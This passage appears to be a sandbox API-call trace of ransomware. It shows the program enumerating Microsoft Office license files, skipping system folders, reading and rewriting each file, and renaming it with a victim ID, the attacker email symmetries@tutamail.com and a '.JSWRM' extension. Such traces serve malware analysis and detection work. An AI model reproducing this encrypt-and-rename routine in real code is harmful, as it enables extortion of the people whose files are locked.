lpString2="windows") returned -1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0108.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0108.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0108.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0108.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0108.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0108.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.377] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11629) returned 1 [0108.377] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0108.377] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0108.380] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.380] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0108.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.380] CloseHandle (hObject=0x45c) returned 1 [0108.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0108.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0108.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0108.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0108.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0108.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0108.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.380] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0108.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0108.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0108.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.381] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9bcdaf1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9bcdaf1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9c8c6af, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bb3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_SubTrial-pl.xrm-ms", cAlternateFileName="PRD1B4~1.XRM")) returned 1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned -1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.381] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.382] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.382] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0108.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0108.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0108.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0108.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0108.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.382] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11187) returned 1 [0108.383] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0108.383] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.385] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.385] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.385] CloseHandle (hObject=0x45c) returned 1 [0108.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0108.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0108.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0108.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0108.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0108.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0108.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.386] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0108.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0108.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.387] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ae8cc6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ae8cc6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9ba7880, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5172, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="PRF9CA~1.XRM")) returned 1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.387] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0108.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0108.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0108.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0108.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0108.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0108.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0108.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.388] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20850) returned 1 [0108.388] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0108.388] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0108.391] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.391] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0108.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.391] CloseHandle (hObject=0x45c) returned 1 [0108.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0108.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0108.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0108.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0108.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0108.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0108.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.393] 